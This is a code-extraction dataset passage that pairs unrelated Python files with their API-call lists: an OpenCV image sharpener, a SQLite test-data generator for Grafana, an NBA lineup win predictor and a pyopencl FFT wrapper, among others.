parser.set_defaults(loglevel='INFO')
parser.set_defaults(model_name=utils.generate_model_name())
return parser.parse_args(args)
def main():
"""Add a new model."""
args = parse_args(sys.argv[1:])
cli_utils.setup_logging(log_level=args.loglevel.upper())
logging.info('model_name: {}'.format(args.model_name))
prepare(args.model_name)
run_report.output_event_report()
|
[
"zaza.charm_lifecycle.utils.generate_model_name",
"zaza.utilities.run_report.output_event_report",
"argparse.ArgumentParser",
"zaza.utilities.run_report.register_event_wrapper",
"zaza.utilities.deployment_env.get_model_constraints",
"zaza.utilities.deployment_env.get_model_settings",
"zaza.utilities.deployment_env.get_cloud_region"
] |
[((876, 932), 'zaza.utilities.run_report.register_event_wrapper', 'run_report.register_event_wrapper', (['"""Prepare Environment"""'], {}), "('Prepare Environment')\n", (909, 932), True, 'import zaza.utilities.run_report as run_report\n'), ((1643, 1668), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1666, 1668), False, 'import argparse\n'), ((2238, 2270), 'zaza.utilities.run_report.output_event_report', 'run_report.output_event_report', ([], {}), '()\n', (2268, 2270), True, 'import zaza.utilities.run_report as run_report\n'), ((1172, 1207), 'zaza.utilities.deployment_env.get_model_settings', 'deployment_env.get_model_settings', ([], {}), '()\n', (1205, 1207), True, 'import zaza.utilities.deployment_env as deployment_env\n'), ((1224, 1257), 'zaza.utilities.deployment_env.get_cloud_region', 'deployment_env.get_cloud_region', ([], {}), '()\n', (1255, 1257), True, 'import zaza.utilities.deployment_env as deployment_env\n'), ((1348, 1386), 'zaza.utilities.deployment_env.get_model_constraints', 'deployment_env.get_model_constraints', ([], {}), '()\n', (1384, 1386), True, 'import zaza.utilities.deployment_env as deployment_env\n'), ((1944, 1971), 'zaza.charm_lifecycle.utils.generate_model_name', 'utils.generate_model_name', ([], {}), '()\n', (1969, 1971), True, 'import zaza.charm_lifecycle.utils as utils\n')]
|
#!/usr/bin/env python
# _*_ coding:utf-8 _*_
import cv2 as cv
import numpy as np
def sharpen(image):
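    # 3x3 sharpening kernel: the weights sum to 1, so edges are boosted while
    # overall brightness is preserved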
    kernel = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]], np.float32)  # sharpen
dst = cv.filter2D(image, -1, kernel=kernel)
cv.imwrite("output00000000_sharpen.png",dst)
for i in range(1):
for j in range(1):
src = cv.imread("./m/png/m9/output00000000.png")
sharpen(src)
|
[
"cv2.imwrite",
"numpy.array",
"cv2.imread",
"cv2.filter2D"
] |
[((114, 173), 'numpy.array', 'np.array', (['[[0, -1, 0], [-1, 5, -1], [0, -1, 0]]', 'np.float32'], {}), '([[0, -1, 0], [-1, 5, -1], [0, -1, 0]], np.float32)\n', (122, 173), True, 'import numpy as np\n'), ((188, 225), 'cv2.filter2D', 'cv.filter2D', (['image', '(-1)'], {'kernel': 'kernel'}), '(image, -1, kernel=kernel)\n', (199, 225), True, 'import cv2 as cv\n'), ((233, 278), 'cv2.imwrite', 'cv.imwrite', (['"""output00000000_sharpen.png"""', 'dst'], {}), "('output00000000_sharpen.png', dst)\n", (243, 278), True, 'import cv2 as cv\n'), ((334, 376), 'cv2.imread', 'cv.imread', (['"""./m/png/m9/output00000000.png"""'], {}), "('./m/png/m9/output00000000.png')\n", (343, 376), True, 'import cv2 as cv\n')]
|
"""Update a SQLite database in real time. Requires Grafana and Python >3.6.
```
python -m pip install numpy tqdm
python create_grafana_sample_db.py
```
See discussion context: https://github.com/fr-ser/grafana-sqlite-datasource/issues/21
"""
import sqlite3
import time
from contextlib import ContextDecorator
from pathlib import Path
import numpy as np
from tqdm import tqdm
class SQLConnection(ContextDecorator):
"""Ensure the SQLite connection is properly opened and closed."""
def __init__(self, path_db: Path) -> None:
"""Initialize context wrapper.
Args:
path_db: Path to a SQLite file
"""
self.conn = None
self.path_db = path_db
def __enter__(self) -> sqlite3.Connection:
"""Connect to the database and return connection reference.
Returns:
Connection: connection to sqlite database
"""
self.conn = sqlite3.connect(self.path_db)
return self.conn
def __exit__(self, exc_type, exc_value, traceback) -> None:
"""Close connection.""" # noqa: DAR101
self.conn.close()
def generate_fake_db(path_db: Path) -> None:
"""Populate a SQL database in real time to test real time chart visualization.
Args:
path_db: path to SQLite file
"""
print(f'Creating: {path_db}') # noqa: T001
with SQLConnection(path_db) as conn:
cursor = conn.cursor()
cursor.execute('DROP TABLE IF EXISTS test_data;')
conn.commit()
cursor.execute("""CREATE TABLE test_data (
time FLOAT NOT NULL,
temp FLOAT NOT NULL,
min FLOAT NOT NULL,
max FLOAT NOT NULL
);""")
conn.commit()
while True:
# Generate random data points and add to the database
points = 1000
mu, sigma = (10, 8) # mean and standard deviation
samples = np.random.normal(mu, sigma, points)
for idx in tqdm(range(points)):
values = f'{time.time()}, {samples[idx]}, {samples[idx] - 2.1}, {samples[idx] + 3.2}'
cursor.execute(f'INSERT INTO test_data (time, temp, min, max) VALUES ({values});') # noqa: S608, Q440
conn.commit()
time.sleep(1)
if __name__ == '__main__':
generate_fake_db(path_db=Path(__file__).resolve().parent / 'test_db.sqlite')
|
[
"time.time",
"time.sleep",
"pathlib.Path",
"sqlite3.connect",
"numpy.random.normal"
] |
[((926, 955), 'sqlite3.connect', 'sqlite3.connect', (['self.path_db'], {}), '(self.path_db)\n', (941, 955), False, 'import sqlite3\n'), ((1949, 1984), 'numpy.random.normal', 'np.random.normal', (['mu', 'sigma', 'points'], {}), '(mu, sigma, points)\n', (1965, 1984), True, 'import numpy as np\n'), ((2296, 2309), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (2306, 2309), False, 'import time\n'), ((2057, 2068), 'time.time', 'time.time', ([], {}), '()\n', (2066, 2068), False, 'import time\n'), ((2368, 2382), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (2372, 2382), False, 'from pathlib import Path\n')]
|
import pandas as pd
import click
def condense(ann_path, out_path, segment_length):
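    # Collapse runs of consecutive segments that share a label into single
    # parent annotations, deduplicating along the way.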
df = pd.read_csv(ann_path)
df = df.sort_values(by=['video_id', 'start_seconds'])
    if 'label' not in df.columns:
df['label'] = df['labeler_2']
df.loc[df['label'] == 'none', 'label'] = 'background'
df.loc[df['labeler_2'].isnull(), 'label'] = df['labeler_1']
df.loc[~df['labeler_3'].isnull(), 'label'] = df['labeler_3']
print("Number of records before dedupe: %d" % len(df))
df.drop_duplicates(subset=["video_id", "start_seconds", "end_seconds"],
keep='first', inplace=True)
print("Number of records after dedupe: %d" % len(df))
parent_starts = []
parent_ends = []
durations = []
end = False
index = 0
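    # Walk the sorted rows, extending each run while the next segment starts
    # exactly where the previous one ended and carries the same label.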
while not end:
row = df.iloc[index]
parent_start = row['start_seconds']
next_row_index = index + 1
last_start = row['start_seconds']
last_duration = row['duration']
while next_row_index < len(df) and df.iloc[next_row_index]['start_seconds'] == last_start + last_duration and \
df.iloc[next_row_index]['label'] == row['label']:
last_start = df.iloc[next_row_index]['start_seconds']
last_duration = df.iloc[next_row_index]['duration']
tmp = df.iloc[next_row_index]
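            # leftover debug trace for one specific video at the merge boundary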
if tmp['video_id'] == 'CfFrwiwgniU':
if tmp['start_seconds'] == 336.0 or tmp['start_seconds'] == 337.0:
print(tmp)
next_row_index += 1
last_row = df.iloc[next_row_index - 1]
parent_end = last_row['end_seconds']
for i in range(index, next_row_index):
parent_starts.append(parent_start)
parent_ends.append(parent_end)
durations.append(parent_end - parent_start)
index = next_row_index
if index >= len(df):
end = True
df['parent_start'] = parent_starts
df['parent_end'] = parent_ends
df['duration'] = durations
df.drop_duplicates(subset=["video_id", "parent_start", "parent_end", "label"], keep='first', inplace=True)
df = df.drop(['start_seconds', 'end_seconds'], axis=1)
df = df.drop(['start_frame', 'end_frame'], axis=1)
df.rename(columns={'parent_start': 'start_seconds'}, inplace=True)
df.rename(columns={'parent_end': 'end_seconds'}, inplace=True)
df = df.loc[:, ~df.columns.str.contains('^Unnamed')]
df = df.reset_index()
df = df.drop(['index'], axis=1)
df.to_csv(out_path)
@click.command()
@click.option('--ann-path', default='../annotations/v0.5.0-anns-5sec.csv')
@click.option('--out-path', default='../annotations/v0.5.0-anns.csv')
@click.option('--segment-length', default=5)
def start(ann_path, out_path, segment_length):
condense(ann_path, out_path, segment_length)
if __name__ == '__main__':
start()
|
[
"pandas.read_csv",
"click.option",
"click.command"
] |
[((2535, 2550), 'click.command', 'click.command', ([], {}), '()\n', (2548, 2550), False, 'import click\n'), ((2552, 2625), 'click.option', 'click.option', (['"""--ann-path"""'], {'default': '"""../annotations/v0.5.0-anns-5sec.csv"""'}), "('--ann-path', default='../annotations/v0.5.0-anns-5sec.csv')\n", (2564, 2625), False, 'import click\n'), ((2627, 2695), 'click.option', 'click.option', (['"""--out-path"""'], {'default': '"""../annotations/v0.5.0-anns.csv"""'}), "('--out-path', default='../annotations/v0.5.0-anns.csv')\n", (2639, 2695), False, 'import click\n'), ((2697, 2740), 'click.option', 'click.option', (['"""--segment-length"""'], {'default': '(5)'}), "('--segment-length', default=5)\n", (2709, 2740), False, 'import click\n'), ((93, 114), 'pandas.read_csv', 'pd.read_csv', (['ann_path'], {}), '(ann_path)\n', (104, 114), True, 'import pandas as pd\n')]
|
import json
import datetime
from django.utils.translation import ugettext, get_language
import elasticutils
from datawinners.accountmanagement.localized_time import convert_utc_to_localized
from datawinners.search.filters import SubmissionDateRangeFilter, DateQuestionRangeFilter
from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name
from datawinners.search.submission_headers import HeaderFactory
from datawinners.search.submission_index_constants import SubmissionIndexConstants
from datawinners.settings import ELASTIC_SEARCH_URL, ELASTIC_SEARCH_TIMEOUT
from datawinners.search.query import QueryBuilder, Query
from mangrove.form_model.field import FieldSet, SelectField, MediaField
from mangrove.form_model.form_model import get_field_by_attribute_value
from mangrove.utils.dates import py_datetime_to_js_datestring
class SubmissionQueryResponseCreator(object):
def __init__(self, form_model, localized_time_delta, use_iso_create_date=False):
self.form_model = form_model
self.localized_time_delta = localized_time_delta
self.use_iso_create_date = use_iso_create_date
def combine_name_and_id(self, short_code, entity_name, submission):
return submission.append(
["%s<span class='small_grey'> %s</span>" % (
entity_name, short_code)]) if entity_name else submission.append(entity_name)
def get_field_set_fields(self, fields, parent_field_code=None):
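        # Recursively collect FieldSet (group/repeat) questions, keyed by their
        # Elasticsearch field name, so their answers can be formatted specially.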
field_set_field_dict = {}
for field in fields:
if isinstance(field, FieldSet):
field_set_field_dict.update(
{es_questionnaire_field_name(field.code, self.form_model.id, parent_field_code): field})
group_field_code = field.code if field.is_group() else None
field_set_field_dict.update(self.get_field_set_fields(field.fields, group_field_code))
return field_set_field_dict
def _populate_datasender(self, res, submission):
if res.get(SubmissionIndexConstants.DATASENDER_ID_KEY) == u'N/A':
submission.append(res.get(SubmissionIndexConstants.DATASENDER_NAME_KEY))
else:
self.combine_name_and_id(res.get(SubmissionIndexConstants.DATASENDER_ID_KEY),
res.get(SubmissionIndexConstants.DATASENDER_NAME_KEY), submission)
def _populate_error_message(self, key, language, res, submission):
error_msg = res.get(key)
if error_msg.find('| |') != -1:
error_msg = error_msg.split('| |,')[['en', 'fr'].index(language)]
submission.append(error_msg)
def _convert_to_localized_date_time(self, key, res, submission):
submission_date_time = datetime.datetime.strptime(res.get(key), "%b. %d, %Y, %I:%M %p")
datetime_local = convert_utc_to_localized(self.localized_time_delta, submission_date_time)
submission.append(datetime_local.strftime("%b. %d, %Y, %H:%M"))
def _convert_to_iso_format_date_time(self, key, res, submission):
submission_date_time = datetime.datetime.strptime(res.get(key), "%b. %d, %Y, %I:%M %p")
js_date_time = py_datetime_to_js_datestring(submission_date_time)
submission.append(js_date_time)
def _get_media_field_codes(self):
return [es_questionnaire_field_name(field.code, self.form_model.id, field.parent_field_code) for
field in
self.form_model.media_fields] if self.form_model.is_media_type_fields_present else []
def create_response(self, required_field_names, search_results):
entity_question_codes = [es_questionnaire_field_name(field.code, self.form_model.id) for field in
self.form_model.entity_questions]
fieldset_fields = self.get_field_set_fields(self.form_model.fields)
meta_fields = [SubmissionIndexConstants.DATASENDER_ID_KEY]
meta_fields.extend([es_unique_id_code_field_name(code) for code in entity_question_codes])
media_field_codes = self._get_media_field_codes()
submissions = []
language = get_language()
for res in search_results.hits:
submission = [res._meta.id]
for key in required_field_names:
if not key in meta_fields:
if key in entity_question_codes:
self.combine_name_and_id(short_code=res.get(es_unique_id_code_field_name(key)),
entity_name=res.get(key), submission=submission)
elif key == SubmissionIndexConstants.DATASENDER_NAME_KEY:
self._populate_datasender(res, submission)
elif key == 'status' and res.get(key):
submission.append(ugettext(res.get(key)))
elif key == SubmissionIndexConstants.SUBMISSION_DATE_KEY or key == SubmissionIndexConstants.SUBMISSION_UPDATED_KEY:
self._convert_to_iso_format_date_time(key, res, submission) if self.use_iso_create_date else\
self._convert_to_localized_date_time(key, res, submission)
elif key == 'error_msg':
self._populate_error_message(key, language, res, submission)
elif key in fieldset_fields.keys():
submission.append(
_format_fieldset_values_for_representation(res.get(key), fieldset_fields.get(key),
res._meta.id))
else:
submission.append(self._append_if_attachments_are_present(res, key, media_field_codes))
submissions.append(submission)
return submissions
def _append_if_attachments_are_present(self, res, key, media_field_codes):
if self.form_model.is_media_type_fields_present and key in media_field_codes:
return _format_media_value(res._meta.id, res.get(key))
else:
return res.get(ugettext(key))
def _format_media_value(submission_id, value):
if value:
return "<a href='/download/attachment/%s/%s'>%s</a>" % (submission_id, value, value)
def _format_values(field_set, formatted_value, value_list, submission_id):
if not value_list:
return ''
value_dict = value_list[0]
for i, field in enumerate(field_set.fields):
if isinstance(field, SelectField):
choices = value_dict.get(field.code)
if choices:
if field.is_single_select:
value = choices
else:
value = '(' + ', '.join(choices) + ')' if len(choices) > 1 else ', '.join(choices)
else:
value = ''
elif isinstance(field, FieldSet):
value = ''
value = _format_values(field, value, value_dict.get(field.code), submission_id)
elif isinstance(field, MediaField):
value = _format_media_value(submission_id, value_dict.get(field.code))
value = '' if not value else value
else:
value = value_dict.get(field.code) or ''
formatted_value += '"' + '<span class="repeat_qtn_label">' + field.label + '</span>' + ': ' + value + '"'
formatted_value += ';' if i == len(field_set.fields) - 1 else ', '
return formatted_value
def _format_fieldset_values_for_representation(entry, field_set, submission_id):
formatted_value = ''
if entry:
for value_dict in json.loads(entry):
formatted_value = _format_values(field_set, formatted_value, [value_dict], submission_id)
formatted_value += '<br><br>'
return '<span class="repeat_ans">' + formatted_value + '</span>'
|
[
"json.loads",
"datawinners.search.index_utils.es_unique_id_code_field_name",
"django.utils.translation.get_language",
"datawinners.search.index_utils.es_questionnaire_field_name",
"mangrove.utils.dates.py_datetime_to_js_datestring",
"django.utils.translation.ugettext",
"datawinners.accountmanagement.localized_time.convert_utc_to_localized"
] |
[((2827, 2900), 'datawinners.accountmanagement.localized_time.convert_utc_to_localized', 'convert_utc_to_localized', (['self.localized_time_delta', 'submission_date_time'], {}), '(self.localized_time_delta, submission_date_time)\n', (2851, 2900), False, 'from datawinners.accountmanagement.localized_time import convert_utc_to_localized\n'), ((3163, 3213), 'mangrove.utils.dates.py_datetime_to_js_datestring', 'py_datetime_to_js_datestring', (['submission_date_time'], {}), '(submission_date_time)\n', (3191, 3213), False, 'from mangrove.utils.dates import py_datetime_to_js_datestring\n'), ((4113, 4127), 'django.utils.translation.get_language', 'get_language', ([], {}), '()\n', (4125, 4127), False, 'from django.utils.translation import ugettext, get_language\n'), ((7566, 7583), 'json.loads', 'json.loads', (['entry'], {}), '(entry)\n', (7576, 7583), False, 'import json\n'), ((3628, 3687), 'datawinners.search.index_utils.es_questionnaire_field_name', 'es_questionnaire_field_name', (['field.code', 'self.form_model.id'], {}), '(field.code, self.form_model.id)\n', (3655, 3687), False, 'from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name\n'), ((3309, 3398), 'datawinners.search.index_utils.es_questionnaire_field_name', 'es_questionnaire_field_name', (['field.code', 'self.form_model.id', 'field.parent_field_code'], {}), '(field.code, self.form_model.id, field.\n parent_field_code)\n', (3336, 3398), False, 'from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name\n'), ((3939, 3973), 'datawinners.search.index_utils.es_unique_id_code_field_name', 'es_unique_id_code_field_name', (['code'], {}), '(code)\n', (3967, 3973), False, 'from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name\n'), ((6070, 6083), 'django.utils.translation.ugettext', 'ugettext', (['key'], {}), '(key)\n', (6078, 6083), False, 'from django.utils.translation import ugettext, get_language\n'), ((1652, 1730), 'datawinners.search.index_utils.es_questionnaire_field_name', 'es_questionnaire_field_name', (['field.code', 'self.form_model.id', 'parent_field_code'], {}), '(field.code, self.form_model.id, parent_field_code)\n', (1679, 1730), False, 'from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name\n'), ((4417, 4450), 'datawinners.search.index_utils.es_unique_id_code_field_name', 'es_unique_id_code_field_name', (['key'], {}), '(key)\n', (4445, 4450), False, 'from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name\n')]
|
from math import sqrt
class BadClass:
def __init__(self, x: int, y: int):
self.x = x
self.y = y
@staticmethod
def length(x: int, y: int) -> float:
return sqrt(x ** 2 + y ** 2)
@staticmethod
def dot(self_x: int, self_y: int, other_x: int, other_y: int) -> int:
return self_x * other_x + self_y * other_y
class GoodClass(object):
def __init__(self, x: int, y: int):
self.x = x
self.y = y
@property
def length(self) -> float:
return sqrt(self.dot(self.x, self.y))
def dot(self, other_x: int, other_y: int) -> int:
return self.x * other_x + self.y * other_y
|
[
"math.sqrt"
] |
[((193, 214), 'math.sqrt', 'sqrt', (['(x ** 2 + y ** 2)'], {}), '(x ** 2 + y ** 2)\n', (197, 214), False, 'from math import sqrt\n')]
|
#!/usr/bin/env python
# flake8: noqa
# For quick tests
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'src.config.settings.local')
import django
django.setup()
##############################################################################
|
[
"os.environ.setdefault",
"django.setup"
] |
[((72, 148), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""src.config.settings.local"""'], {}), "('DJANGO_SETTINGS_MODULE', 'src.config.settings.local')\n", (93, 148), False, 'import os\n'), ((164, 178), 'django.setup', 'django.setup', ([], {}), '()\n', (176, 178), False, 'import django\n')]
|
import os
import pickle
import pandas as pd
import sys
import cmd
#season = input("What NBA season would you like to select? Enter between 2001-2016. ")
#season = int(season)
#player_list = input("Enter 5 players from that season in a format like this... '<NAME>','<NAME>'...")
#player_list = player_list.split(',')
#print(player_list)
player_list = sys.argv[1].split(',')
season = int(sys.argv[2])
# player_list = ("<NAME>","<NAME>","<NAME>","<NAME>","<NAME>")
# season = 2015
path = os.getcwd() #get working directory
player_data = pd.read_csv(path + '/data/player_data.csv') #get data
player_data_sr= pd.read_csv(path + '/data/player_data_single_record.csv')
season_average_data = pd.read_csv(path + '/data/season_average_data.csv', index_col=0)
salary_data = pd.read_csv(path + '/data/salaries_2017.csv')
pd_sr = player_data_sr[player_data_sr['season']==season]
sa_data = season_average_data[season_average_data['season']==season]
import functions.predictWinPercentage as predictWinPercentage #import function
import functions.playerSwap as playerSwap
#Get prediction
prediction = predictWinPercentage.predictWinPercentage(player_data_sr, season_average_data, player_list, season)
#A note on salary cap
if season == 2017:
salary_result = playerSwap.salaryCap(player_list, salary_data, .8)
if salary_result['over_cap'] == True:
comment = 'The total salary of your team is ' + str(salary_result['total_salary']) + 'M. That is higher than 80 percent of the salary cap' + \
' so this team might be unrealistic... but this is just for fun! This dream team\'s ' + prediction
print(comment)
else:
print(prediction)
else:
print(prediction)
#Ask the user if more information about team is desired
response = input("Would you like to know the strengths and weaknesses of your team? Respond 'yes' or 'no'! ")
if response == 'yes':
z_score = playerSwap.getZScores(player_list, pd_sr, sa_data)
result = playerSwap.teamAssessment(z_score)
print(result['weaknesses'])
print(result['strengths'])
response = input("Would you like me to make a recommendation on a player to add to your team? Respond 'yes' or 'no'! ")
if response == 'yes' and season == 2017:
response2 = input("Should we consider the salary cap in order to give a realistic player swap? Respond 'yes' or 'no'! ")
if response2 == 'yes':
potential_swaps = playerSwap.assessPlayerSwaps(player_list, pd_sr, sa_data, salary_data, True)
result = playerSwap.recommendPlayer(player_list, potential_swaps)
else:
potential_swaps = playerSwap.assessPlayerSwaps(player_list, pd_sr, sa_data, salary_data, False)
result = playerSwap.recommendPlayer(player_list, potential_swaps)
print(result)
response3 = input("Do you want to know the new predicted win percentage with this swap? Respond 'yes' or 'no'! ")
if response3 == 'yes':
new_player_list = playerSwap.recommendPlayer(player_list, potential_swaps, return_new_team_list=True)
prediction = predictWinPercentage.predictWinPercentage(pd_sr, sa_data, new_player_list, season)
print(prediction)
elif response == 'yes':
potential_swaps = playerSwap.assessPlayerSwaps(player_list, pd_sr, sa_data, salary_data, True)
result = playerSwap.recommendPlayer(player_list, potential_swaps)
print(result)
response3 = input("Do you want to know the new predicted win percentage with this swap? Respond 'yes' or 'no'! ")
if response3 == 'yes':
new_player_list = playerSwap.recommendPlayer(player_list, potential_swaps, return_new_team_list=True)
prediction = predictWinPercentage.predictWinPercentage(pd_sr, sa_data, new_player_list, season)
print(prediction)
if response == 'no':
print('Sounds good, peace out!')
exit()
|
[
"functions.playerSwap.teamAssessment",
"functions.playerSwap.salaryCap",
"functions.playerSwap.recommendPlayer",
"os.getcwd",
"pandas.read_csv",
"functions.playerSwap.assessPlayerSwaps",
"functions.predictWinPercentage.predictWinPercentage",
"functions.playerSwap.getZScores"
] |
[((488, 499), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (497, 499), False, 'import os\n'), ((537, 580), 'pandas.read_csv', 'pd.read_csv', (["(path + '/data/player_data.csv')"], {}), "(path + '/data/player_data.csv')\n", (548, 580), True, 'import pandas as pd\n'), ((607, 664), 'pandas.read_csv', 'pd.read_csv', (["(path + '/data/player_data_single_record.csv')"], {}), "(path + '/data/player_data_single_record.csv')\n", (618, 664), True, 'import pandas as pd\n'), ((687, 751), 'pandas.read_csv', 'pd.read_csv', (["(path + '/data/season_average_data.csv')"], {'index_col': '(0)'}), "(path + '/data/season_average_data.csv', index_col=0)\n", (698, 751), True, 'import pandas as pd\n'), ((766, 811), 'pandas.read_csv', 'pd.read_csv', (["(path + '/data/salaries_2017.csv')"], {}), "(path + '/data/salaries_2017.csv')\n", (777, 811), True, 'import pandas as pd\n'), ((1091, 1194), 'functions.predictWinPercentage.predictWinPercentage', 'predictWinPercentage.predictWinPercentage', (['player_data_sr', 'season_average_data', 'player_list', 'season'], {}), '(player_data_sr,\n season_average_data, player_list, season)\n', (1132, 1194), True, 'import functions.predictWinPercentage as predictWinPercentage\n'), ((1250, 1301), 'functions.playerSwap.salaryCap', 'playerSwap.salaryCap', (['player_list', 'salary_data', '(0.8)'], {}), '(player_list, salary_data, 0.8)\n', (1270, 1301), True, 'import functions.playerSwap as playerSwap\n'), ((1857, 1907), 'functions.playerSwap.getZScores', 'playerSwap.getZScores', (['player_list', 'pd_sr', 'sa_data'], {}), '(player_list, pd_sr, sa_data)\n', (1878, 1907), True, 'import functions.playerSwap as playerSwap\n'), ((1918, 1952), 'functions.playerSwap.teamAssessment', 'playerSwap.teamAssessment', (['z_score'], {}), '(z_score)\n', (1943, 1952), True, 'import functions.playerSwap as playerSwap\n'), ((2340, 2416), 'functions.playerSwap.assessPlayerSwaps', 'playerSwap.assessPlayerSwaps', (['player_list', 'pd_sr', 'sa_data', 'salary_data', '(True)'], {}), '(player_list, pd_sr, sa_data, salary_data, True)\n', (2368, 2416), True, 'import functions.playerSwap as playerSwap\n'), ((2428, 2484), 'functions.playerSwap.recommendPlayer', 'playerSwap.recommendPlayer', (['player_list', 'potential_swaps'], {}), '(player_list, potential_swaps)\n', (2454, 2484), True, 'import functions.playerSwap as playerSwap\n'), ((2512, 2589), 'functions.playerSwap.assessPlayerSwaps', 'playerSwap.assessPlayerSwaps', (['player_list', 'pd_sr', 'sa_data', 'salary_data', '(False)'], {}), '(player_list, pd_sr, sa_data, salary_data, False)\n', (2540, 2589), True, 'import functions.playerSwap as playerSwap\n'), ((2601, 2657), 'functions.playerSwap.recommendPlayer', 'playerSwap.recommendPlayer', (['player_list', 'potential_swaps'], {}), '(player_list, potential_swaps)\n', (2627, 2657), True, 'import functions.playerSwap as playerSwap\n'), ((2836, 2923), 'functions.playerSwap.recommendPlayer', 'playerSwap.recommendPlayer', (['player_list', 'potential_swaps'], {'return_new_team_list': '(True)'}), '(player_list, potential_swaps,\n return_new_team_list=True)\n', (2862, 2923), True, 'import functions.playerSwap as playerSwap\n'), ((2935, 3021), 'functions.predictWinPercentage.predictWinPercentage', 'predictWinPercentage.predictWinPercentage', (['pd_sr', 'sa_data', 'new_player_list', 'season'], {}), '(pd_sr, sa_data, new_player_list,\n season)\n', (2976, 3021), True, 'import functions.predictWinPercentage as predictWinPercentage\n'), ((3082, 3158), 'functions.playerSwap.assessPlayerSwaps', 'playerSwap.assessPlayerSwaps', (['player_list', 'pd_sr', 'sa_data', 'salary_data', '(True)'], {}), '(player_list, pd_sr, sa_data, salary_data, True)\n', (3110, 3158), True, 'import functions.playerSwap as playerSwap\n'), ((3169, 3225), 'functions.playerSwap.recommendPlayer', 'playerSwap.recommendPlayer', (['player_list', 'potential_swaps'], {}), '(player_list, potential_swaps)\n', (3195, 3225), True, 'import functions.playerSwap as playerSwap\n'), ((3403, 3490), 'functions.playerSwap.recommendPlayer', 'playerSwap.recommendPlayer', (['player_list', 'potential_swaps'], {'return_new_team_list': '(True)'}), '(player_list, potential_swaps,\n return_new_team_list=True)\n', (3429, 3490), True, 'import functions.playerSwap as playerSwap\n'), ((3502, 3588), 'functions.predictWinPercentage.predictWinPercentage', 'predictWinPercentage.predictWinPercentage', (['pd_sr', 'sa_data', 'new_player_list', 'season'], {}), '(pd_sr, sa_data, new_player_list,\n season)\n', (3543, 3588), True, 'import functions.predictWinPercentage as predictWinPercentage\n')]
|
from __future__ import annotations
from typing import TYPE_CHECKING, Union
from warnings import filterwarnings
import pyopencl as cl
import pyopencl.array as cla
import numpy as np
from gpyfft.fft import FFT
from ._util import get_context
filterwarnings("ignore", module="pyopencl")
if TYPE_CHECKING:
from reikna.cluda.cuda import Array as cudaArray
from reikna.cluda.ocl import Array as oclArray
Array = Union[cudaArray, oclArray]
context = get_context()
queue = cl.CommandQueue(context)
# plan cache
_PLAN_CACHE = {}
def _normalize_axes(dshape, axes):
"""Convert possibly negative axes to positive axes."""
if axes is None:
return None
_axes = [axes] if np.isscalar(axes) else list(axes)
try:
return tuple(np.arange(len(dshape))[_axes])
except Exception as e:
raise TypeError(f"Cannot normalize axes {axes}: {e}")
def _get_fft_plan(arr, axes=None, fast_math=False):
    """Cache and return a gpyfft FFT plan suitable for `arr` type and shape."""
axes = _normalize_axes(arr.shape, axes)
plan_key = (arr.shape, arr.dtype, axes, fast_math)
if plan_key not in _PLAN_CACHE:
_PLAN_CACHE[plan_key] = FFT(context, queue, arr, axes=axes, fast_math=fast_math)
return _PLAN_CACHE[plan_key]
def _fftn(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, ...] | None = None,
inplace: bool = False,
fast_math: bool = True,
*,
_inverse: bool = False,
) -> Array:
"""Perform fast Fourier transformation on `input_array`.
Parameters
----------
input_arr : numpy or OCL array
A numpy or OCL array to transform. If an OCL array is provided, it must already
be of type `complex64`. If a numpy array is provided, it will be converted
        to `complex64` before the transformation is performed.
output_arr : numpy or OCL array, optional
An optional array/buffer to use for output, by default None
axes : tuple of int, optional
        A tuple of axes over which to perform the transform.
        If not given, the transform is performed over all axes, by default None
inplace : bool, optional
Whether to place output data in the `input_arr` buffer, by default False
fast_math : bool, optional
Whether to enable fast (less precise) mathematical operations during
compilation, by default True
_inverse : bool, optional
Perform inverse FFT, by default False. (prefer using `ifftn`)
Returns
-------
OCLArray
result of transformation (still on GPU). Use `.get()` or `cle.pull`
to retrieve from GPU.
If `inplace` or `output_arr` where used, data will also be placed in
the corresponding buffer as a side effect.
Raises
------
TypeError
If OCL array is provided that is not of type complex64. Or if an unrecognized
array is provided.
ValueError
If inplace is used for numpy array, or both `output_arr` and `inplace` are used.
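
    Example
    -------
    A minimal, illustrative sketch (assumes a working OpenCL context; the
    array names are placeholders)::

        data = np.random.rand(64, 64).astype(np.complex64)
        result = fftn(data)  # OCL array, still on the GPU
        host = result.get()  # copy the transform back to host memory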
"""
if output_arr is not None and inplace:
raise ValueError("`output_arr` cannot be provided if `inplace` is True")
assert input_arr.dtype in (np.float32, np.float64, np.complex64, np.complex128)
if not np.iscomplexobj(input_arr):
input_arr = input_arr.astype(np.complex64) # TODO
_input_array = (
cla.to_device(queue, input_arr)
if isinstance(input_arr, np.ndarray)
else input_arr
)
transform = _get_fft_plan(_input_array, axes=axes, fast_math=fast_math)
if not inplace:
if output_arr is None:
output_arr = cla.empty_like(_input_array)
transform.result = output_arr
(event,) = transform.enqueue(forward=not _inverse)
event.wait()
if not inplace:
return output_arr
return _input_array
def fft(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: int = -1,
inplace: bool = False,
fast_math: bool = True,
) -> Array:
return fftn(input_arr, output_arr, (axes,), inplace, fast_math)
def ifft(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: int = -1,
inplace: bool = False,
fast_math: bool = True,
) -> Array:
return ifftn(input_arr, output_arr, (axes,), inplace, fast_math)
def fft2(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, int] = (-2, -1),
inplace: bool = False,
fast_math: bool = True,
) -> Array:
return fftn(input_arr, output_arr, axes, inplace, fast_math)
def ifft2(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
